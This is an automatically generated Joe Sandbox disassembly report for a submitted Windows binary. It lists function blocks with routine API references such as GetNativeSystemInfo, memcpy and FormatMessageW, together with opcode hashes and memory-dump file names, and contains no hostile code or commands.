                                                                                • Opcode ID: 48f5db1aa3807254ce0d3c3ba3599f528be59d7b2ec74138965f66581f357966
                                                                                • Instruction ID: 5015d73053f31e41eb786119d6f7a2c70dc77ac034249f383db117d4599dd948
                                                                                • Opcode Fuzzy Hash: 48f5db1aa3807254ce0d3c3ba3599f528be59d7b2ec74138965f66581f357966
                                                                                • Instruction Fuzzy Hash: 6FF01236900114AFDB11EF95FC41CCEB775EB143047408179E961A71B2DB35A955CF8D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1193 403fb2-403fcb GetProcAddress 1194 403fd9-403fdc 1193->1194 1195 403fcd-403fd8 GetNativeSystemInfo 1193->1195
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 00403FC3
                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?,00403FE2,004061EA,00000001,00000001,00000000,?,00000000), ref: 00403FD1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: AddressInfoNativeProcSystem
                                                                                • String ID: GetNativeSystemInfo
                                                                                • API String ID: 2220751540-3949249589
                                                                                • Opcode ID: deffbf9ad2f06d67f5a7a96eac976a7a49d3226baf58badd71ca99372c048d5e
                                                                                • Instruction ID: 809e6a6de965d18d48b39f8f4e00aed40c1c5cd8ab5549a1552232fcd34172b3
                                                                                • Opcode Fuzzy Hash: deffbf9ad2f06d67f5a7a96eac976a7a49d3226baf58badd71ca99372c048d5e
                                                                                • Instruction Fuzzy Hash: 0ED0A72070020566CB059FB1AD059DB77F89A086487100170E803F00D0EA79DD90D365
                                                                                APIs
                                                                                  • Part of subcall function 0041563D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417EB7), ref: 0041566D
                                                                                  • Part of subcall function 0041563D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00417EB7), ref: 0041567E
                                                                                • ??2@YAPAXI@Z.MSVCRT(?), ref: 0041800B
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,40000000,?,?,?), ref: 00418029
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,40000000,?,?,?,40000000), ref: 00418170
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@
                                                                                • String ID:
                                                                                • API String ID: 4113381792-0
                                                                                • Opcode ID: c15f5d0beeeb490aad9ffba395f768548b5be021a449d81dfc99857ea69e856a
                                                                                • Instruction ID: cc61e8b391bfb9a68098a7a85693b93431bc851093f7dc7a68c56b28134787d6
                                                                                • Opcode Fuzzy Hash: c15f5d0beeeb490aad9ffba395f768548b5be021a449d81dfc99857ea69e856a
                                                                                • Instruction Fuzzy Hash: 75917E30A0464AEFCF14DFA5C480AEEFBB1BF08304F10852EE45593351DB79AA95CB99
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00008000), ref: 00416445
                                                                                • memmove.MSVCRT(?,00000000,00000020), ref: 00416516
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0041652A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@memmove
                                                                                • String ID:
                                                                                • API String ID: 3828600508-0
                                                                                • Opcode ID: 05ec2175672de1b7bbd471e59bb4d2610a36e6e1bc21139cd237a80f6b11bca6
                                                                                • Instruction ID: e46483b1e26eb5a1fabff0b355717e6b670c62617ced1e5d33f235f132d045da
                                                                                • Opcode Fuzzy Hash: 05ec2175672de1b7bbd471e59bb4d2610a36e6e1bc21139cd237a80f6b11bca6
                                                                                • Instruction Fuzzy Hash: 2351B372A00111ABDF28CE58D944AEF77B5EB44344F26805EEC0AA7245D778ED81C79C
                                                                                APIs
                                                                                  • Part of subcall function 00403FB2: GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 00403FC3
                                                                                  • Part of subcall function 00403FB2: GetNativeSystemInfo.KERNELBASE(?,?,?,00403FE2,004061EA,00000001,00000001,00000000,?,00000000), ref: 00403FD1
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FDA
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FE2
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FEA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$AddressInfoNativeProcSystem
                                                                                • String ID:
                                                                                • API String ID: 3731959171-0
                                                                                • Opcode ID: 5c283d7852b514708a02b75cb6ebbc8b54e1ca4fb39554e1d11dd4f09c4b7cc9
                                                                                • Instruction ID: 186da13b794c0488880814f39f9d3c8b5d3938503a91300c0f4d7e9b813a1536
                                                                                • Opcode Fuzzy Hash: 5c283d7852b514708a02b75cb6ebbc8b54e1ca4fb39554e1d11dd4f09c4b7cc9
                                                                                • Instruction Fuzzy Hash: D8411EB1D0100AABCF05EF91D9519EEB77AAF84308B14802BE61177291DB3D9E46CB59
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                  • Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
                                                                                  • Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
                                                                                  • Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38
                                                                                  • Part of subcall function 00402963: ??2@YAPAXI@Z.MSVCRT(00000018,?,0040508D,?,?,?,00000000,?,?,?,?,?,?,?,?,004055D0), ref: 00402968
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004050C1
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004050C9
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                  • Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0
                                                                                  • Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,0041ADC8,?,?,?,00000000), ref: 004050B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@memcpy
                                                                                • String ID:
                                                                                • API String ID: 2235277842-0
                                                                                • Opcode ID: 661f259fb05883ee0348b2fd58029c071bd69da0cdcb289f760b6714a35ba1f7
                                                                                • Instruction ID: cd7eefcb3942dadf62e4d55478a983632e4f227aec1de2fe510d8449e6a20180
                                                                                • Opcode Fuzzy Hash: 661f259fb05883ee0348b2fd58029c071bd69da0cdcb289f760b6714a35ba1f7
                                                                                • Instruction Fuzzy Hash: F1015E369040086ADB04F7A6D897EDEB7B99F94318F10406FF602321E5EE796EC5C69C
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
                                                                                • memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@memcpy
                                                                                • String ID:
                                                                                • API String ID: 1695611338-0
                                                                                • Opcode ID: eb4113704ef7df0299e623d88e425c6b6c8be198676a832d45efa2abd2ff9853
                                                                                • Instruction ID: 5ae65c736532b918d339eda4e39a4522a491bca8134069b199daa1df5c004d60
                                                                                • Opcode Fuzzy Hash: eb4113704ef7df0299e623d88e425c6b6c8be198676a832d45efa2abd2ff9853
                                                                                • Instruction Fuzzy Hash: 0CF0F673600205BBD7249F5DD84189BF7E9EF84310714852FF24983220E731F8908798
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00920F20,00000000,?,00404EE8,?,?,?,?,?), ref: 004031F5
                                                                                • lstrlenA.KERNEL32(00920F20,?,00000000,00000000,00000000,00000000,?,00920F20,00000000,?,00404EE8,?,?,?,?,?), ref: 004031FD
                                                                                • memmove.MSVCRT(?,?,00920F20,?,?,00001000,00920F20,?,00000000,00000000,00000000,00000000,?,00920F20,00000000), ref: 004032E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$memmove
                                                                                • String ID:
                                                                                • API String ID: 1832346882-0
                                                                                • Opcode ID: d3b4572a5035ea254cd94ab5b5b1443f4ae13b851958d648fafb26d562424527
                                                                                • Instruction ID: 6402f2dcb6e7945984cbe825a7499a6737a03c255d7b5dcfc401763690269d5e
                                                                                • Opcode Fuzzy Hash: d3b4572a5035ea254cd94ab5b5b1443f4ae13b851958d648fafb26d562424527
                                                                                • Instruction Fuzzy Hash: 48410371D00258AFCB14DFA9C8948EEBFB9FF48351F1480AAE815B7245D7389E85CB64
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(?,?,?,?), ref: 004111D7
                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 004111E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer
                                                                                • String ID:
                                                                                • API String ID: 2976181284-0
                                                                                • Opcode ID: 30d92e823d37ce749e0f7cd4d34f4784bcb9e104199bba823438aa63f853fc4d
                                                                                • Instruction ID: cdad48c5939bcc49fa85d80ef965e6b95473a265ce0d2249c6c6cde8a06b51fe
                                                                                • Opcode Fuzzy Hash: 30d92e823d37ce749e0f7cd4d34f4784bcb9e104199bba823438aa63f853fc4d
                                                                                • Instruction Fuzzy Hash: 1BF09A71600218AF8F00CF68DC049DB7BE9AF09324B148269E91AD7360E630DE55EB65
                                                                                APIs
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                • KiUserCallbackDispatcher.NTDLL(00000010), ref: 00407715
                                                                                • GetSystemMetrics.USER32(00000011), ref: 00407723
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@CallbackDispatcherMetricsSystemUser
                                                                                • String ID:
                                                                                • API String ID: 145748454-0
                                                                                • Opcode ID: 479bd63978f28fe7566e90bf22cf9ab23cd4c2d010775e76fc726262a7908e22
                                                                                • Instruction ID: 717b70004c9186839aecef00c0b16e534ce711e486b0d128d54a4644bfe03861
                                                                                • Opcode Fuzzy Hash: 479bd63978f28fe7566e90bf22cf9ab23cd4c2d010775e76fc726262a7908e22
                                                                                • Instruction Fuzzy Hash: A6F017B4A047058FD3A4EF7AA9402C6BAE5BB58300705C93FD986C7690E7B4B445DF89
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00413D90
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00413DC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: 896c1087cd7bbb7dc627c9ffcc443e77ad22d141fa8ddf54c665425f9ae04d73
                                                                                • Instruction ID: 574acab8dc6da0f92556d3d590f48fbb046e393e5bca8a27cda65f89530e78df
                                                                                • Opcode Fuzzy Hash: 896c1087cd7bbb7dc627c9ffcc443e77ad22d141fa8ddf54c665425f9ae04d73
                                                                                • Instruction Fuzzy Hash: ED2116752007049FCB28CF55E884AA7B7B9FF88711B148A5DE85A8B761C371F941CBA4
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast
                                                                                • String ID:
                                                                                • API String ID: 918212764-0
                                                                                • Opcode ID: ead0b55b2ff90a578750a1408e92beac7d58b39fc771555b91704b17d1c49430
                                                                                • Instruction ID: 7524d8466beb45fe17ee677bdba99b749b9283a1bf838bd9c5283ef0b8d4f745
                                                                                • Opcode Fuzzy Hash: ead0b55b2ff90a578750a1408e92beac7d58b39fc771555b91704b17d1c49430
                                                                                • Instruction Fuzzy Hash: 07D09E316192116BEB605E79B8087A726D8BF00761B15C47AA441D63C5EA78DC42465A
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00415BE7
                                                                                  • Part of subcall function 0041817D: _EH_prolog.MSVCRT ref: 00418182
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: H_prolog
                                                                                • String ID:
                                                                                • API String ID: 3519838083-0
                                                                                • Opcode ID: 9b468c4666b132781755553e503f48ddc8162a130e10772a6baf9a03058fb964
                                                                                • Instruction ID: f396f6b083a0fa58f5464e9653f63b5c42f30b53b93fa251e57ee2b7c9474d42
                                                                                • Opcode Fuzzy Hash: 9b468c4666b132781755553e503f48ddc8162a130e10772a6baf9a03058fb964
                                                                                • Instruction Fuzzy Hash: A7417B31600709DFCB21DF64C884BDAB7A8AF84304F14449AE40ADB211EB79ED85CB60
                                                                                APIs
                                                                                  • Part of subcall function 00411743: ??2@YAPAXI@Z.MSVCRT(00000004,0041E844,004065C3,00000000,0041E844,0041E844), ref: 0041174B
                                                                                  • Part of subcall function 00404E67: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FDA
                                                                                  • Part of subcall function 00404E67: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FE2
                                                                                  • Part of subcall function 00404E67: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404FEA
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405445
                                                                                  • Part of subcall function 0040976C: wvsprintfW.USER32(?,00000000,?), ref: 0040978F
                                                                                  • Part of subcall function 0040976C: GetLastError.KERNEL32 ref: 004097A0
                                                                                  • Part of subcall function 0040976C: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00920F20), ref: 004097C8
                                                                                  • Part of subcall function 0040976C: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00920F20), ref: 004097DD
                                                                                  • Part of subcall function 0040976C: lstrlenW.KERNEL32(?), ref: 004097F0
